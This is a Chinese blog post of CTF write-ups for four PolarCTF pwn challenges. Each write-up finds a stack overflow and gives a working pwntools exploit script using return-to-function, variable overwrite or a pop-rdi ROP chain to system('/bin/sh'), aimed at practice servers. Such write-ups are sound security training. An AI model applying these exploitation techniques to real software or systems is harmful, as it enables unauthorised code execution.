Polar PWN内容WP 二

最新推荐文章于 2025-09-12 10:18:35 发布
原创 最新推荐文章于 2025-09-12 10:18:35 发布 · 2.3k 阅读 · 59 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #linux #安全 #安全性测试

五、emm

下载文件放入虚拟机中查看一下

32位ELF文件,开启栈不可执行保护(NX)

放入IDA中看一下

映入眼帘的就是一个flag函数,直接看一下flag函数中的内容

好嘛!cat flag 思路明确了

接着我们进入main函数中出现的yes函数,查看一下yes函数中的内容

一个栈溢出,read写入的是100个字节,远远超出定义的58字节

利用溢出,返回cat flag

思路有了

计算偏移地址

偏移地址:0x58+4

找出flag函数地址

flag_addr=0x80484CB

差不多了,开搞!

from pwn import *
r =remote("ip", port)
​
flag_addr=0x80484CB
padding=0x58+4
payload=b'a' * padding + p32(flag_addr)
r.sendline(payload)
r.interactive()

运行脚本后得到flag

六、Choice

下载 虚拟机 查看

64位ELF文件,开启NX保护

进入IDA查看

发现有3个函数,Data1-3

进入Data1查看

有溢出,但不多 达不到攻击条件

进入Data2查看

同Data1 一样 溢出但不多

进入Data3查看

这才对嘛,有溢出,也够用!

找到了溢出点再找找有没有后门函数 shift+F12查找字符串

跟踪进入看一下,这是哪个函数里的

标准,太标准了 标准且典型的后门函数

思路有了:利用Data3函数中的溢出,返回到这个后门函数

现在是找出地址

先找到后门函数地址:0x4007BD

然后找出偏移地址:0x30+8

编写脚本开干

from pwn import *
r =remote("120.46.59.242", 2112)
​
flag_addr=0x4007BD
padding=0x30+8
payload=b'a' * padding + p64(flag_addr)
r.sendlineafter(b'Menu:\n',b'3') //注意,进入Data3函数之前是要输入数值的 这里发送个3 使其进入Data3函数
r.sendline(payload)
r.interactive()

运行脚本后cat flag即可

七、overload1

这题我也没理清思路,所以就直接按照WP写了,有懂的可以评论一下 让我开开眼

下、放、查

ELF 64 NX开

IDA 看

使用了gets函数,是个溢出

if语句中v5[1]97进行了比较,当v5[1]等于97,可以执行system()函数。

所以就是利用溢出,将v5[1]的值覆盖成97 也就是ascii码中的‘a’

进入main函数的第一个if循环,输入一个y。

通过构造攻击链让程序返回v5[1]等于字符a

已知溢出变量和所要覆盖变量的距离即可算出距离,构造出Payload。

payload =  0x110 * 'a'

脚本如下

from pwn import *
r =remote("IP",port)
#r = process("./overload1")
elf = ELF("./overload1")
r.recvline()
r.recvline()
payload = 'y'
r.sendline(payload)
#payload1 = 0x120 * 'a'
payload1 = 0x110 * 'a'
r.recvline()
r.sendline(payload1)
r.interactive()                          

八、X64

查看一下文件

64位ELF文件,什么都没开???!!认真的么铁子

进入主函数发现有一个function函数,进入function函数查看

一个溢出点

shift+F12查看字符串

有bin/sh字符串

但是bin/sh字符串并没有和system组合在一起,因此我们需要通过传参将bin/sh传入到system中

64位传参:参数从左到右放入寄存器:RDI, RSI, RDX, ECX, R8, R9,之后跟32位一样

大体思路如下:

找出溢出偏移量、进入function函数中、覆盖返回地址为shell 将/bin/sh作为参数传入

开始找值:

偏移量:0x80+8

bin字符串地址:0x601060

system地址:0x4006B6

还差一个rdi地址

使用命令:

 ROPgadget --binary x64 --only "pop|ret"

找到RDI地址

RDI_addr=0x4007e3

编程搞事

from pwn import *
r =remote("120.46.59.242", 2130)
​
bin_addr=0x601060
padding=0x80+8
sys_addr=0x4006B6
rdi_addr=0x4007e3
payload=b'a' * padding + p64(rdi_addr)+p64(bin_addr)+p64(sys_addr)
r.sendline(payload)
r.interactive()

运行,然后cat flag即可

Polar Codes in MATLAB - v2_polar码_polar编码_Polar码_polarcode_polar
09-11
1. **生成矩阵**:Polar码的生成矩阵是2的幂次减1乘以单位矩阵的矩阵运算结果,即`G = [1 0; 1 1]^N`,其中N为编码长度。这个矩阵用于将信息位转换为编码位。 2. **编码过程**:信息位与生成矩阵进行比特级乘法...
polar代码MATLAB (1).rar_Matlab代码_Polar码_polar_polar coding_sc译码
07-14
Polar码的核心思想是通过矩阵的串行乘法将多个进制输入信道转化为一些极化信道,其中一部分信道表现为几乎无错误的“冻结”信道,另一部分则表现为几乎总是出错的信道。编码过程就是将信息位分配给那些“好”的...
Polar靶场-Pwn-困难-8字节能干什么(leak ebp 与栈迁移)
最新发布
Welcome To Myon'Blog !
09-12 890
栈迁移的核心:首先利用栈溢出将 ebp 覆盖为目标地址(也就是想迁移到哪里)然后把返回地址ret addr 覆盖为 leave;ret 指令的地址,这样我们可以执行两次 leave;ret。第一次,函数正常返回,执行 leave;ret,mov esp ebp 让两个指针处于同一位置(ebp)pop ebp 会将 ebp 弹到我们覆盖的那个地址,接着 ret,返回到下一个 gadget,再次执行 leave;ret,mov esp ebp ,将 esp 也迁移到了 ebp 的位置。
Polar PWN内容WP
pythonZLX的博客
03-17 1768
NX保护机制:将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。Stack保护机制:在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致。我们继续,将程序丢入IDA64中查看一下main函数发现一个叫box的函数,进去看一看。
Polar PWN内容WP
pythonZLX的博客
03-19 2058
老规矩查看一下文件64位开启nx保护进入ida查看一下有两个函数,一个叫dalao,一个叫caiji输入1进入大佬函数,输入2进入菜鸡函数,先进去大佬函数看一下淦,被骂了;进入菜鸡函数看一下一个溢出漏洞,shift+F12查找字符串有bin/sh跟踪一下发现一个标准的后门函数思路:输入2进入菜鸡函数,然后利用溢出跳到后门函数位置编写然后cat flag即可。
PolarCTF】 PWN_test_format
2301_76148382的博客
10-12 320
4.根据所得到的结果从前往后数,到Canary是第7位,考虑到还需要输入格式化字符串来泄露Canary,所以可以得到Cannary的偏移为6​​。因此可通过%6$n​​来修改n​​的值,将变量n​​的值修改为int​​字节数,即满足n​​的值为数值4​​,进而拿到权限。需要去调试到Canary位置的偏移量,通过格式化字符串漏洞修改n​的值为​4​。如果变量​n​和数值​4​相等,则程序调用​Shell()​函数。3.x/16wx $esp:以16进制查看​esp​处的参数。
Polar PWN内容WP
pythonZLX的博客
06-17 837
先去下载文件,然后导入到虚拟机中file和checksec一下可以看到是64位程序,并且同时开启了金丝雀和NX保护我们将程序放进IDA中查看一下源码有一个很明显的后门函数,但是需要一些条件在我们运行程序的时候会问我们是不是喜欢小猫,此时有两个选项其实不管输入哪个都无法触发后门函数,因为输入的内容是在buf变量中,而参与判断的是s2变量。我们发现buf变量定义是32个而read可输入的是40个,所以这里有溢出点buf到s2的距离是0x50-0x30。
polar ctf pwn
03-02
### Polar CTF Pwn 类别解题思路与漏洞利用技巧 #### 深入理解Pwn题目特点 在处理像PolarCTF这样的竞赛中的Pwn题目时,重要的是认识到这些挑战通常涉及内存安全问题,尤其是栈溢出和格式化字符串漏洞。如果学到的...
PolarCTF 2024冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北话是最好的语言
2401_87298847的博客
09-22 1132
在第三个与第四个红框处,根据用户输入的size值来开辟相应的内存空间,随后note内容被存入该空间.bss段中notelist处空间情况如下图所示(2)然后,查看del_note()函数该函数根据用户输入的 Index 值来确定删除哪一个note,第个红框中,对存放note和puts函数的内存空间都进行了释放,但没有将指针置空,存在漏洞可以发现,题目给出的程序存在后门函数magic,通过执行该函数可以获取flag。
polar_SC译码.rar_FPGA polar code_polar FPGA_polar码 FPGA_polar码译码_
07-14
该部分的主要功能是完成基于FPGA的polar码SC译码。
寒假作业1.8
zl0_00_0的博客
01-08 302
给了两个文件一个文本文件一个python文件,用记事本看一下理解一下python文件的含义大概就是将一个图片转换成字符串,转换的结果就是另一个文件。计算机只能处理进制的内容,将‘[ ] ,’ 删掉,把255换成1,可以用Visual Studio Code实现。黑色像素的RGB值是(0,0,0),白色则是(255,255,255),也就是说把1换成黑色像素,0换成白色像素。接下来就是写一个逆向的程序,也没接触过,用ai写了几个在参考一下网上的资料改出来了一个。misc:polar靶场0和255。
Polarctf PWN(简单):持续跟新
2302_81473559的博客
03-20 1983
我是在学习PWN知识中在B站刚好有Polarctf平台的师傅讲的很好,所以发现了这个平台。由于我是新手如果文章那里有讲的不对的地方欢迎指正连接如下:B站连接【PolarCTF入门系列讲座——PWN篇】Polarctf平台连接开始进入主题。
PolarCTF 靶场PWN(一)
2402_88025561的博客
04-01 505
read能输入40个字节 buf只有32个存在溢出 然后我们计算buf到s2的距离 (0x50-0x30)覆盖到这里之后 在输入lovecat\x00。打开ida发现了box函数,分析之后发现不能输入cat flag,但是还要对buf进行赋值。照例checksec查一下发现是64位然后开启了NX保护。照例查看 在ida里发现有输入可以造成溢出。找漏洞没找到到这里就很懵了,不知道怎么做了。学习一下别的师傅的思路发现直接输入$0就行。这就典型的后门函数了,直接写exp。然后我们就可以写exp了。
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6905
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
PolarCTF 2023冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北话是最好的语言(2)
m0_60635609的博客
04-08 964
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
pwn刷题记录
Sean_summer的博客
03-18 774
当程序存在fork函数并触发canary时,__ stack_chk_fail函数只能关闭fork函数所建立的进程,不会让主进程退出,所以当存在大量调用fork函数时,我们可以利用它来一字节一字节的泄露。fork()最大的特点就是一次调用,两次返回,两次返回主要是区分父子进程,因为fork()之后将出现两个进程,所以有两个返回值,父进程返回子进程ID,子进程返回0。通过复制的方式创建一个进程,被创建的进程称为子进程,调用进程称为父进程,复制的子进程是从父进程fork()调用后面的语句开始执行的。
PWN-Sandbox 介绍
m0_57836225的博客
11-19 1071
利用内核漏洞如果操作系统内核存在漏洞,攻击者可能利用这些漏洞突破 Sandbox 的限制。例如,在某些情况下,内核中的权限检查代码可能存在逻辑错误,攻击者可以通过精心构造的输入触发该漏洞,从而提升在 Sandbox 中的权限,使其能够访问更多系统资源或者执行被禁止的操作。资源耗尽攻击针对 Sandbox 对资源的限制,攻击者可能尝试进行资源耗尽攻击。
picoCTF pwn wp - Here‘s a LIBC
fa1c4的blog
06-26 471
直接运行不正确, 需要更换ld文件 libc版本是2.27的, 所以ld文件需要匹配成2.27的 用glibc-all-in-one下载debug组件, 里边有ld文件, 拷贝过去 用patchelf命令执行libc和ld文件的替换操作 patchelf --replace-needed libc.so.6 ./libc.so.6 ./alibc patchelf --set-interpreter ./ld-2.27.so ./alibc 然后就能正常运行 栈溢出, ret2libc, 构..
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值